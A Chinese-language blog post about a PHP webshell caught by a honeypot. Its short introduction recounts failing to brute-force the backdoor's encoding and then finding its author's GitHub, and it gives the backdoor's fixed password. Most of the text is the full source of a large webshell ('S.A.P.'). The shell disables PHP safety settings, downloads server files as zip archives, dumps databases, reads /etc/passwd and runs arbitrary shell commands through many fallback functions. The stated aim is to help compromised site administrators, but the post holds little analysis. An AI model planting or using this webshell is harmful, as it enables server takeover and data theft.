简介
最近蜜罐捕获一个php马, 本打算爆破, 无奈之下改为搜索, 然后找到马儿的主人.
文章目录
- 目的
- php马主发现过程
- php木马
- php大马
- 参考链接
目的
本文无技术内容, 纯扯淡和记录该木马供其他被种马的网站管理员快速回去木马和获取木马来源.
php马主发现过程
第一次接触到gzinflate+base64, 于是参看了诸位大佬的博客和分析文章然后有了下文
代码编码顺序: gzdeflate压缩 + 自定义编码 + base64_encode, 作为一个爱装X的coder, 看到这个算法之后第一感觉是爆破它, 然后用python写了一个爆破脚本, 然后发现并不能爆破出来, 哈哈, 太TM丢人了, 所以开始找google帮忙, 用$ord = ord( $filter[$i] ) - ord( $wp_nonce[$i] );作为关键字搜索, 发现大量的相同php后门, 可把我高兴坏了, 这说明要么是一个组织持续搞事情要么是开源的php马儿, 这个算法我没法爆破说明生成也是十分难的, 因此密码可能是固定的, 于是开始搜github, 然后找到php木马大佬的git(各种马)。
G0YgIaXqx php马儿密码
php木马
1 |
|
php大马
1 | /* d66d26866789b352294fe2da07b1af004ad56f910 */@ini_set('log_errors_max_len',0);@ini_restore('log_errors');@ini_restore('error_log');@ini_restore('error_reporting');@ini_set('log_errors',0);@ini_set('error_log',NULL);@ini_set('error_reporting',NULL);@error_reporting(0);@ini_set('max_execution_time',0);@set_time_limit(0);@ignore_user_abort(TRUE);@ini_set('memory_limit','1000M');@ini_set('file_uploads',1);@ini_restore('magic_quotes_runtime');@ini_restore('magic_quotes_sybase');@ini_set('magic_quotes_gpc',0);@ini_set('magic_quotes_runtime',0);@ini_set('magic_quotes_sybase',0);if(PHP_VERSION<'5.4') @set_magic_quotes_runtime(0);@ini_restore('safe_mode');@ini_restore('open_basedir');@ini_restore('safe_mode_exec_dir');@ini_set('safe_mode',0);@ini_set('open_basedir',NULL);@ini_set('safe_mode_exec_dir','');@ini_restore('disable_function');@ini_set('disable_function', '');function escHTML($v){return str_replace(array('&', '"', '<', '>'), array('&', '"', '<', '>'),$v);}function ssa($a){foreach($a as $k=>$v)if(is_array($v))$a[$k]=ssa($v);else $a[$k]=stripslashes($v);return($a);}function bname($p){$p=explode(DIRECTORY_SEPARATOR,$p);return end($p);}if(@get_magic_quotes_gpc())$_POST=ssa($_POST);class zc {var $cr=''; var $fc=0; var $co=0; var $msm=5242880; var $msd=52428800; var $ig; var $fs; function init($n='archive'){$this->ig=@function_exists('gzopen');header('Content-type: application/x-zip');header('Content-Disposition: attachment; filename='.$n.'_'.$_SERVER['HTTP_HOST'].'_'.date('Y-m-d_H.i').'.zip');header('Content-Transfer-Encoding: binary');header('Last-Modified: '.@gmdate('D, d M Y H:i:s').' GMT');}function add($a){foreach($a as $v)if(@is_readable($v)){if(@is_dir($v))$this->ad($v,$v);elseif(@is_file($v))$this->af($v,$v);}}function ad($p,$n){if($d=@opendir($p)){while( FALSE !==($v=@readdir($d)))if($v!='.' && $v!='..' && @is_readable($p.DIRECTORY_SEPARATOR.$v)){if(@is_dir($p.DIRECTORY_SEPARATOR.$v))$this->ad($p.DIRECTORY_SEPARATOR.$v,$n.'/'.$v);elseif(@is_file($p.DIRECTORY_SEPARATOR.$v))$this->af($p.DIRECTORY_SEPARATOR.$v,$n.'/'.$v);}@closedir($d);}}function af($p,$n){$s=@stat($p);if(!$s) return;$h1="\x14\x00\x08\x00". (($this->ig && ($s[7]<=$this->msd ))?"\x08":"\x00" ). "\x00" .$this->pd($s[9]);$h2=pack('v', strlen($n)). "\x00\x00";echo "\x50\x4b\x03\x04",$h1, "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",$h2,$n;if($this->ig && ($s[7]<=$this->msm)){$b=@file_get_contents($p);$crc=pack('V', crc32($b));$b=gzdeflate($b);$cs=strlen($b);echo $b;}elseif($this->ig && ($s[7]<=$this->msd)){$t=@tempnam('/tmp/', '');$f=@fopen($p, 'rb');$g=@gzopen($t, 'wb');while(!feof($f)) @gzwrite($g, fread($f, 1048576));@gzclose($g);@fclose($f);$f=@fopen($t, 'rb');@fseek($f, 10);while(!feof($f))echo fread($f, 1048576);@fseek($f, -8, SEEK_END);$crc=fread($f, 4);@fclose($f);$cs=@filesize($t)-10; @unlink($t);}else{$cs=0;$crc=false;$f=@fopen($p, 'rb');while(!feof($f)){$b=fread($f, 1048576);$l=strlen($b);$cc=crc32($b);$cs +=$l;echo $b;$b='';if($crc)$crc=$this->crc32c($crc,$cc,$l);else $crc=$cc;}@fclose($f);$crc=pack('V',$crc);}$h3=$crc. pack('V',$cs). pack('V',$s[7]);echo "\x50\x4b\x07\x08",$h3;$this->cr .="\x50\x4b\x01\x02\x00\x00".$h1.$h3.$h2."\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".pack('V',$this->co).$n;$this->co +=$cs+46+strlen($n);++$this->fc;}function of($n){$this->fs['n']=$n;$h="\x14\x00\x08\x00\x00\x00".$this->pd(time());$this->cr .="\x50\x4b\x01\x02\x00\x00".$h;$this->fs['h2']=pack('v', strlen($n))."\x00\x00";echo "\x50\x4b\x03\x04",$h, "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",$this->fs['h2'],$n;$this->fs['cs']=0;$this->fs['crc']=false;}function wf($d){$l=strlen($d);$cc=crc32($d);$this->fs['cs'] +=$l;if($this->fs['crc'])$this->fs['crc']=$this->crc32c($this->fs['crc'],$cc,$l);else $this->fs['crc']=$cc;echo $d;}function cf(){$h=pack('V',$this->fs['crc']).pack('V',$this->fs['cs']).pack('V',$this->fs['cs']);echo "\x50\x4b\x07\x08",$h;$this->cr .=$h.$this->fs['h2']."\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".pack('V',$this->co).$this->fs['n'];$this->co +=$this->fs['cs']+46+strlen($this->fs['n']);$this->fs=array();++$this->fc;}function pd($t){$t=getdate($t);return pack('v', ($t['hours']<<11)+($t['minutes']<<5)+$t['seconds']/2).pack('v', (($t['year']-1980)<<9)+($t['mon']<<5)+$t['mday']);}function cl(){$c="Archive created by S.A.P. v.2.1\nHost: : ".$_SERVER['HTTP_HOST']."\nDate : ".date('d-m-Y');$this->fc=pack('v',$this->fc);echo $this->cr, "\x50\x4b\x05\x06\x00\x00\x00\x00",$this->fc,$this->fc, pack('V', strlen($this->cr)), pack('V',$this->co), pack('v', strlen($c)),$c;}function crc32c($c1,$c2,$l){$o[0]=0xedb88320;$r=1; for($i=1;$i<32; ++$i){$o[$i]=$r;$r<<=1;}$this->cgms($e,$o);$this->cgms($o,$e);do {$this->cgms($e,$o);if($l & 1)$c1=$this->cgmt($e,$c1);$l>>=1;if($l==0)break;$this->cgms($o,$e);if ($l & 1)$c1=$this->cgmt($o,$c1);$l>>=1;}while($l !=0);return $c1 ^ $c2;}function cgms(&$s, &$m){for($i=0;$i<32; ++$i)$s[$i]=$this->cgmt($m,$m[$i]);}function cgmt(&$m,$v){$s=$i=0; while($v ){if($v & 1)$s ^=$m[$i];$v=($v >> 1) & 0x7FFFFFFF; ++$i;}return $s;}}class sc {var $tp=''; var $cl=NULL; var $cs=''; var $rs=NULL; var $sv=NULL; function init($tp){$this->tp=$tp;}function cn($ha,$hp,$un,$up){switch($this->tp){case 'mysql': $p=empty($hp)?'':':'.$hp;if($this->cl=@mysql_connect($ha.$p,$un,$up, TRUE)){@mysql_query('SET NAMES utf8',$this->cl);$this->sv=@mysql_get_server_info($this->cl);}break;case 'mssql': $p=empty($hp)?'':','.$hp;$this->cl=@mssql_connect($ha.$p,$un,$up, TRUE);break;case 'pg': $p=empty($hp)?'':' port='.$hp;$this->cs=$cs='host='.$ha.$p.' user='.$un.' password='.$up;$this->cl=@pg_connect($cs);break;}if($this->cl) return TRUE; else return FALSE;}function sd($n){switch($this->tp){case 'mysql': @mysql_select_db($n,$this->cl);break;case 'mssql': @mssql_select_db($n,$this->cl);break;case 'pg': @pg_close($this->cl);$this->cl=@pg_connect($this->cs.' dbname='.$n);break;}}function q($q){switch($this->tp){case 'mysql': $this->rs=@mysql_query($q,$this->cl);break;case 'mssql': $this->rs=@mssql_query($q,$this->cl);break;case 'pg': $this->rs=@pg_query ($this->cl,$q);break;}return $this->rs;}function ql($d,$t,$p,$l){switch($this->tp){case 'mysql': $p=($p-1)*$l;$q='SELECT * FROM `'.$d.'`.`'.$t.'` LIMIT '.$p.','.$l; break;case 'mssql': $t=explode('.',$t, 2);$p=$p*$l;$q='SELECT TOP '.$l.' * FROM (SELECT TOP '.$p.' * FROM ['.$d.'].['.$t[0].'].['.$t[1].'] ORDER BY 1 DESC)T ORDER BY 1 ASC'; break;case 'pg': $p=($p-1)*$l;$t=explode('.',$t, 2);$q='SELECT * FROM "'.$d.'"."'.$t[0].'"."'.$t[1].'" LIMIT '.$l.' OFFSET '.$p; break;}return $q;}function ld(){switch($this->tp){case 'mysql': $this->rs=@function_exists('mysql_list_dbs')?@mysql_list_dbs($this->cl) : @mysql_query('SHOW DATABASES',$this->cl);if(@mysql_num_rows($this->rs)==0 && $this->sv[0]>'4')$this->rs=@mysql_query('SELECT schema_name FROM information_schema.schemata',$this->cl);break;case 'mssql': if((!$this->rs=@mssql_query('SELECT name FROM sys.databases',$this->cl)) || @mssql_num_rows($this->rs,$this->cl)==0)if((!$this->rs=@mssql_query('SELECT name FROM sys.sysdatabases',$this->cl)) || @mssql_num_rows($this->rs,$this->cl)==0)if((!$this->rs=@mssql_query('EXEC sys.sp_databases',$this->cl)) || @mssql_num_rows($this->rs,$this->cl)==0)if((!$this->rs=@mssql_query('EXEC sys.sp_helpdb',$this->cl)) || @mssql_num_rows($this->rs,$this->cl)==0)$this->rs=@mssql_query('EXEC sys.sp_oledb_database',$this->cl);break;case 'pg': if((!$this->rs=@pg_query($this->cl, 'SELECT datname FROM pg_catalog.pg_database WHERE NOT datistemplate')) || @pg_num_rows($this->rs)==0)$this->rs=@pg_query($this->cl, 'SELECT datname FROM pg_catalog.pg_stat_database WHERE numbackends!=0');break;}return $this->rs;}function lt($n){switch($this->tp ){case 'mysql': $this->rs=@function_exists('mysql_list_tables')?@mysql_list_tables($n,$this->cl):@mysql_query('SHOW TABLES FROM `'.$n.'`',$this->cl);if(@mysql_num_rows($this->rs)==0 && $this->sv[0]>'4')$this->rs=@mysql_query("SELECT table_name FROM information_schema.tables WHERE table_schema='".$n."'",$this->cl);break;case 'mssql': if((!$this->rs=@mssql_query("SELECT table_schema+'.'+table_name FROM [".$n."].[information_schema].[tables] ORDER BY table_schema",$this->cl)) || @mssql_num_rows($this->rs,$this->cl)==0)if((!$this->rs=@mssql_query("SELECT schema_name(schema_id)+'.'+name FROM [".$n."].[sys].[tables] ORDER BY schema_id",$this->cl)) || @mssql_num_rows($this->rs,$this->cl)==0)if((!$this->rs=@mssql_query("SELECT schema_name(schema_id)+'.'+name FROM [".$n."].[sys].[objects] WHERE type='U' ORDER BY schema_id",$this->cl)) || @mssql_num_rows($this->rs,$this->cl)==0)$this->rs=@mssql_query("SELECT schema_name(schema_id)+'.'+name FROM [".$n."].[sys].[all_objects] WHERE type='U' ORDER BY schema_id",$this->cl);break;case 'pg': @pg_close($this->cl);$this->cl=@pg_connect($this->cs.' dbname='.$n);if((!$this->rs=@pg_query($this->cl, 'SELECT table_schema||\'.\'||table_name FROM "'.$n.'"."information_schema"."tables" WHERE table_schema!=\'pg_catalog\' AND table_schema!=\'information_schema\' ORDER BY table_schema')) || @pg_num_rows($this->rs)==0)if((!$this->rs=@pg_query($this->cl, 'SELECT schemaname||\'.\'||tablename FROM "'.$n.'"."pg_catalog"."pg_tables" WHERE schemaname!=\'pg_catalog\' AND schemaname!=\'information_schema\' ORDER BY schemaname')) || @pg_num_rows($this->rs)==0)if((!$this->rs=@pg_query($this->cl, 'SELECT schemaname||\'.\'||relname FROM "'.$n.'"."pg_catalog"."pg_stat_all_tables" WHERE schemaname!=\'pg_catalog\' AND schemaname!=\'pg_toast\' AND schemaname!=\'information_schema\' ORDER BY schemaname')) || @pg_num_rows($this->rs)==0)$this->rs=@pg_query($this->cl, 'SELECT schemaname||\'.\'||relname FROM "'.$n.'"."pg_catalog"."pg_statio_all_tables" where schemaname!=\'pg_catalog\' AND schemaname!=\'pg_toast\' AND schemaname!=\'information_schema\' ORDER BY schemaname');break;}return $this->rs;}function ts($d,$t){switch($this->tp ){case 'mysql': if($this->sv[0]>'4' && $r=@mysql_query("SELECT table_rows FROM information_schema.tables WHERE table_schema='".$d."' AND table_name='".$t."'",$this->cl)) return (int)@mysql_result($r, 0, 0);else{$r=@mysql_query('SELECT COUNT(*) FROM `'.$d.'`.`'.$t.'`',$this->cl);return (int)@mysql_result($r, 0, 0);}break;case 'mssql': $t=explode('.',$t, 2);$r=@mssql_query('SELECT COUNT(*) FROM ['.$d.'].['.$t[0].'].['.$t[1].']',$this->cl);return (int)@mssql_result($r, 0, 0);break;case 'pg': $t=explode('.',$t, 2);if(!$r=@pg_query($this->cl, 'SELECT n_live_tup FROM "'.$d.'"."pg_catalog"."pg_stat_all_tables" WHERE schemaname=\''.$t[0].'\' AND relname=\''.$t[1].'\''))$r=@pg_query($this->cl, 'SELECT COUNT(*) FROM "'.$d.'"."'.$t[0].'"."'.$t[1].'"');return (int)@pg_fetch_result($r, 0, 0);break;}}function fv($o,$r=NULL){if($r==NULL)$r=$this->rs;if($this->tp=='pg')$f='pg_fetch_result'; else $f=$this->tp.'_result'; return @$f($r,$o, 0);}function fn($o){$f=$this->tp.'_field_name'; return @$f($this->rs,$o);}function fr(){$f=$this->tp.'_fetch_row'; return @$f($r=$this->rs);}function e(){switch($this->tp){case 'mysql': return @mysql_error($this->cl);break;case 'mssql': return @mssql_get_last_message();break;case 'pg': return @pg_last_error($this->cl);break;}}function dt($d,$t, &$f){switch($this->tp ){case 'mysql': $f->wf("\n-- \n-- `".$d."`.`".$t."`\n-- \nDROP TABLE IF EXISTS `".$t."`;\n");@mysql_query('SET SQL_QUOTE_SHOW_CREATE=1',$this->cl);$q=@mysql_query('SHOW CREATE TABLE `'.$d.'`.`'.$t.'`',$this->cl);$q=@mysql_fetch_row($q);$f->wf(preg_replace('/(default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP|DEFAULT CHARSET=\w+|COLLATE=\w+|character set \w+|collate \w+)/i', '/*!40101 \\1 */',$q[1]).";\n\n");$q=@mysql_unbuffered_query('SELECT * FROM `'.$d.'`.`'.$t.'`',$this->cl);if($r=@mysql_fetch_row($q)){$f->wf('INSERT INTO `'.$t.'` VALUES ');$r=array_map('mysql_real_escape_string',$r);$f->wf("\n('".implode("', '",$r)."')");while($r=@mysql_fetch_row($q)){$r=array_map('mysql_real_escape_string',$r);$f->wf(",\n('".implode("', '",$r)."')");}$f->wf(";\n");}break;case 'mssql': $t=explode('.',$t, 2);$f->wf("\n-- \n-- ".$t[0].".".$t[1]."\n-- \nIF EXISTS(SELECT table_name FROM information_schema.tables WHERE table_name='".$t[1]."') DROP TABLE [".$t[1]."];\nCREATE TABLE [".$t[1]."] ( ");$q="SELECT '['+column_name+']', '['+data_type+']', case when character_maximum_length IS NOT NULL then '('+ cast( character_maximum_length as varchar(255)) +')' end, case when is_nullable='no' then 'NOT NULL' end, case when column_default IS NOT NULL then 'DEFAULT '+column_default end FROM ".$d.".information_schema.columns WHERE table_schema='".$t[0]."' AND table_name='".$t[1]."'";$q=@mssql_query($q,$this->cl);$c=array();while($r=@mssql_fetch_row($q))$c[]=implode(' ',$r);$f->wf(implode(', ',$c).");\n\n");$q=@mssql_query('SELECT * FROM ['.$d.'].['.$t[0].'].['.$t[1].']',$this->cl);if($r=@mssql_fetch_row($q)){$f->wf('INSERT INTO ['.$t[1].'] VALUES ');$r=array_map('addslashes',$r);$f->wf("\n('".implode("', '",$r)."')");while($r=@mssql_fetch_row($q)){$r=array_map('addslashes',$r);$f->wf(",\n('".implode("', '",$r)."')");}$f->wf(";\n");}break;case 'pg': @pg_close($this->cl);$this->cl=@pg_connect($this->cs.' dbname='.$d);$t=explode('.',$t, 2);$f->wf("\n-- \n-- ".$t[0].".".$t[1]."\n-- \n".'DROP TABLE IF EXISTS "'.$t[1].'";'."\n".'CREATE TABLE "'.$t[1].'" ( ');$q="SELECT '\"'||a.attname||'\"', format_type(a.atttypid, a.atttypmod), CASE WHEN a.attnotnull then 'NOT NULL' end FROM pg_class c, pg_attribute a WHERE c.relname='".$t[1]."' AND not a.attisdropped AND a.attnum>0 AND a.attrelid=c.oid AND c.relnamespace=(select oid from pg_namespace where nspname='".$t[0]."')";$q=@pg_query($this->cl,$q);$c=array();while($r=@pg_fetch_row($q))$c[]=implode(' ',$r);$f->wf( implode(', ',$c).");\n\n");$q=@pg_query($this->cl, 'SELECT * FROM "'.$d.'"."'.$t[0].'"."'.$t[1].'"');if($r=@pg_fetch_row($q)){$f->wf('INSERT INTO "'.$t[1].'" VALUES ');$r=array_map('pg_escape_string',$r);$f->wf("\n('".implode("', '",$r)."')");while($r=@pg_fetch_row($q)){$r=array_map('pg_escape_string',$r);$f->wf(",\n('".implode("', '",$r)."')");}$f->wf(";\n");}break;}}function cl(){$f=$this->tp.'_close'; @$f($this->cl);}}if(isset($_POST['fdw']) || isset($_POST['fdwa'])){@session_write_close();if(isset($_POST['fdwa']) && !empty($_POST['fc'])){$_POST['fc']=array_map('str_rot13',$_POST['fc']);$z=new zc();$z->init();$z->add($_POST['fc']);$z->cl();die();}elseif(isset($_POST['fdw'])){$_POST['fdw']=str_rot13($_POST['fdw']);header('Content-type: multipart/octet-stream');header('Content-Disposition: attachment; filename='.bname($_POST['fdw']));header('Content-Transfer-Encoding: binary');header('Accept-Ranges: bytes');header('Content-Length: '.@filesize($_POST['fdw']));header('Last-Modified: '.gmdate('D, d M Y H:i:s').' GMT');@readfile($_POST['fdw']);die();}}if(isset($_POST['sdd']) && !empty($_POST['cd'])){$z=new zc();$z->init('SQL_dump');@session_start();$c=$_SESSION['DB']; @session_write_close();$s=new sc();$s->init($c['tp']);if($s->cn($c['ha'],$c['hp'],$c['un'],$c['up'])){foreach($_POST['cd'] as $v){$z->of($v.'.sql');$z->wf('-- -------------------------------- --'."\n".'-- [ SQL Dump created by S.A.P. ] --'."\n".'-- ['.str_pad($_SERVER['HTTP_HOST'], 30, ' ', STR_PAD_BOTH).'] --'."\n".'-- [ '.date('Y/m/d').' ] --'."\n".'-- -------------------------------- --'."\n");$s->lt($v);$i=0; while($t=$s->fv($i++))$s->dt($v,$t,$z);$z->cf();}$s->cl();}$z->cl();die();}if(isset($_POST['sdt']) && !empty($_POST['ct'])){class ce {function me(){}function wf($s){echo $s;}}$e=new ce();@session_start();$c=$_SESSION['DB']; @session_write_close();header('Content-type: multipart/octet-stream');header('Content-Disposition: attachment; filename='.$_SERVER['HTTP_HOST'].'_['.$c['db'].']_'.date('Y-m-d_H.i').'.sql');header('Content-Transfer-Encoding: binary');header('Last-Modified: '.gmdate('D, d M Y H:i:s').' GMT');echo '-- -------------------------------- --', "\n", '-- [ SQL Dump created by S.A.P. ] --', "\n", '-- [', str_pad($_SERVER['HTTP_HOST'], 30, ' ', STR_PAD_BOTH), '] --', "\n", '-- [ ', date('Y/m/d'), ' ] --', "\n", '-- -------------------------------- --', "\n";$s=new sc();$s->init($c['tp']);if($s->cn($c['ha'],$c['hp'],$c['un'],$c['up'])){foreach($_POST['ct'] as $v)$s->dt($c['db'],$v,$e);$s->cl();}die();}function mt(){list($usec,$sec)=explode(' ', microtime());return ((float)$usec+(float)$sec);}define('ST', mt());define('IW', strtolower(substr(PHP_OS,0,3))=='win');@session_start();if(!empty($_POST['cs']))$_SESSION['CS']=$_POST['cs']; elseif(empty($_SESSION['CS']))$_SESSION['CS']='UTF-8';if(empty($_SESSION['CP']) || isset($_POST['gh']))$_SESSION['CP']=@dirname($_SERVER['SCRIPT_FILENAME']);elseif(isset($_POST['fp']) || isset($_POST['fpr'])){if(isset($_POST['fpr']))$_POST['fp']=str_rot13($_POST['fpr']);if(@is_file($_POST['fp'])){$_SESSION['CP']=@dirname($_POST['fp']);$_POST['fef']=$_POST['fp'];}elseif(@is_dir($_POST['fp']))$_SESSION['CP']=$_POST['fp'];$_SESSION['CP']=@realpath($_SESSION['CP']);}if(IW)$_SESSION['CP']=str_replace('\\', '/',$_SESSION['CP']);if(substr($_SESSION['CP'],-1) !='/')$_SESSION['CP'].='/'; @chdir($_SESSION['CP']);define('PE', @function_exists('posix_geteuid'));$ui=array();$gi=array();if(!PE && !IW){if(@is_readable('/etc/passwd')){$a=file('/etc/passwd');foreach($a as $v){$v=explode(':',$v);$ui[ $v[2] ]=$v[0];}}if(@is_readable('/etc/group')){$a=file('/etc/group');foreach($a as $v){$v=explode(':',$v);$gi[ $v[2] ]=$v[0];}}}function sm($m,$t){echo '<fieldset class="'.$t.'">', escHTML($m), '</fieldset>';}function ctf($c){$t=@tempnam('/tmp/', '');$f=@fopen($t, 'w');@fwrite($f,$c);@fclose($f);return $t;}function se($c){@ob_start();if($r=@`echo 1`)echo @`$c`; elseif(@function_exists('exec')){@exec($c,$r);echo @implode("\n",$r);}elseif(@function_exists('system')) @system($c);elseif(@function_exists('shell_exec'))echo @shell_exec($c);elseif(@function_exists('passthru')) @passthru($c);elseif(@is_resource($f=@popen($c, 'r'))){while(!feof($f))echo fread($f,1024);@pclose($f);}elseif(@is_resource($f=@proc_open($c, array(array('pipe', 'r'), array('pipe', 'w'), array('pipe', 'a')),$p)) ){echo @stream_get_contents($p[1]);@proc_close($f);}elseif(@function_exists('pcntl_exec')) @pcntl_exec('/bin/sh', array('-c',$c));elseif(@function_exists('expect_popen') && is_resource($f=@expect_popen($c))){while(!feof($f))echo fread($f, 1024);@fclose($f);}elseif(@is_resource($f=@fopen('expect://'.$c, 'r'))){while(!feof($f))echo fread($f, 1024);@fclose($f);}echo escHTML(@ob_get_clean());}@header("Content-Type: text/html; charset=".$_SESSION['CS']);?><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"/><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=<?php |
